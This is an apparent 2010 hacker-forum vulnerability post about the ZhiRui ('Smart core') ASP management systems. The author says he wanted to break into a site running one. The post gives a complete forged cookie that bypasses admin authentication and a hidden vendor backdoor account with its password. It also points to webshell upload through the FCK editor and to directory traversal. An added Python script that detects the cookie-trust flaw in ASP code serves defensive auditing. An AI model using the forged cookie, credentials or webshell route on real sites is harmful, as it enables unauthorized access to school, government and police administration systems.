Smart core management system universal vulnerability

ID MYHACK58:62201027708
Type myhack58
Reporter Anonymous
Modified 2010-07-28T00:00:00


A universal vulnerability in the Smart core management system. A few days ago I happened to need to get into a site running the Chi Rui school management system, so I downloaded the Smart core system and read its code. In the ADMIN directory, the admin_check.asp file (code below) is written so that values from COOKIES are copied into the SESSION, which means forged COOKIES can be used to get into the admin directory.

In addition, I found that the database management table of this system contains an account that Smart core left for management. The management list file is protected by simple encryption; after decrypting it, I found that the file that displays the administrator account list shows the accounts with ID>1, so it can be seen that the account with ID=1 is a small back door left by Chi Rui.

After downloading the official corporate website system, the government website system and the public security information management system, I found that the back end of all of these systems can be entered through COOKIES deception, and that they all have the hidden account.

COOKIES: ZhiRui=Check=ZhiRuiSystem&AdminPurview=%7C111%2C%7C112%2C%7C113%2C%7C114%2C%7C115%2C%7C116%2C%7C117%2C%7C118%2C%7C119%2C%7C121%2C%7C122%2C%7C211%2C%7C212%2C%7C311%2C%7C312%2C%7C313%2C%7C314%2C%7C511%2C%7C512%2C%7C513%2C%7C514%2C%7C611%2C%7C612%2C%7C711%2C%7C712%2C%7C713%2C%7C714%2C%7C411%2C%7C412%2C%7C413%2C%7C414%2C%7C415%2C%7C811%2C%7C812%2C%7C813%2C%7C814%2C%7C815%2C%7C911%2C&ZhiRuiUser=%C4%DA%B2%BF%B5%F7%CA%D4&ZhiRuiAdmin=zhirui

I have not yet found a way to get a WEBSHELL from the back end. One version ships with the FCK editor, and a WEBSHELL can be obtained through the editor. The file manager in the back end can traverse directories. These are the usable points I found; corrections are welcome.

The hidden account is zhirui:1 2 3 4 5 6

<%
' Any non-empty ZhiRuiAdmin cookie is copied into the session,
' so the session values below are fully controlled by the client.
if trim(request.cookies("ZhiRui")("ZhiRuiAdmin"))<>"" then
    session("ZhiRuiAdmin")=request.cookies("ZhiRui")("ZhiRuiAdmin")
    session("ZhiRuiUser")=request.cookies("ZhiRui")("ZhiRuiUser")
    session("AdminPurview")=request.cookies("ZhiRui")("AdminPurview")
End if
' This check passes whenever the cookie above was present.
If trim(session("ZhiRuiAdmin"))="" then
    Response.Write("<script language=javascript>alert('your cache time has been to or is empty, please return to re-login!'); this.top.location.href='Admin_Login.asp';</script>")
    Response.End
End if
' The "authentication code" is a fixed string read from the same cookie.
If Request.Cookies("ZhiRui")("Check")<>"ZhiRuiSystem" then
    Response.Write("<script language=javascript>alert('your core authentication code error, please return to re-login!'); this.top.location.href='Admin_Login.asp';</script>")
    Response.End
End if
%>
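For auditing other classic ASP code bases for the same flaw, the following is an added example (not part of the original advisory or the vendor's code) that flags the two patterns seen in admin_check.asp: a Session value assigned from Request.Cookies, and a cookie compared against a fixed string. The function name `audit_asp` is hypothetical, `VULNERABLE` is abridged from the code on this page, and `SAFE` is a constructed sample.

```python
import re

COOKIE = r'request\s*\.\s*cookies\s*\(\s*"([^"]+)"\s*\)(?:\s*\(\s*"([^"]+)"\s*\))?'
# session("X") = request.cookies("A")("B"): client input promoted to server-side state
ASSIGN_RE = re.compile(r'session\s*\(\s*"([^"]+)"\s*\)\s*=\s*' + COOKIE, re.I)
# request.cookies("A")("B") <> "literal": a fixed string used as an authentication code
STATIC_RE = re.compile(COOKIE + r'\s*(?:<>|=)\s*"([^"]+)"', re.I)

def audit_asp(source):
    """Return (line_no, kind, detail) for each cookie-trust pattern in ASP source."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if line.strip().startswith("'"):  # skip VBScript comment lines
            continue
        for m in ASSIGN_RE.finditer(line):
            cookie = "/".join(p for p in m.group(2, 3) if p)
            findings.append((no, "cookie-to-session", f"{m.group(1)} <- {cookie}"))
        for m in STATIC_RE.finditer(line):
            cookie = "/".join(p for p in m.group(1, 2) if p)
            findings.append((no, "static-cookie-check", f"{cookie} vs {m.group(3)!r}"))
    return findings

# Abridged from the admin_check.asp code shown on this page.
VULNERABLE = '''<%
if trim(request.cookies("ZhiRui")("ZhiRuiAdmin"))<>"" then
session("ZhiRuiAdmin")=request.cookies("ZhiRui")("ZhiRuiAdmin")
session("ZhiRuiUser")=request.cookies("ZhiRui")("ZhiRuiUser")
session("AdminPurview")=request.cookies("ZhiRui")("AdminPurview")
End if
If Request.Cookies("ZhiRui")("Check")<>"ZhiRuiSystem" then
Response.End
End if
%>'''

# Constructed sample: the check relies only on state the server set at login.
SAFE = '''<%
If Trim(Session("ZhiRuiAdmin"))="" Then
Response.Redirect "Admin_Login.asp"
End If
%>'''

if __name__ == "__main__":
    for finding in audit_asp(VULNERABLE):
        print(finding)
```

A check shaped like `SAFE` only holds if the session values are written solely by the login page after the password has been verified.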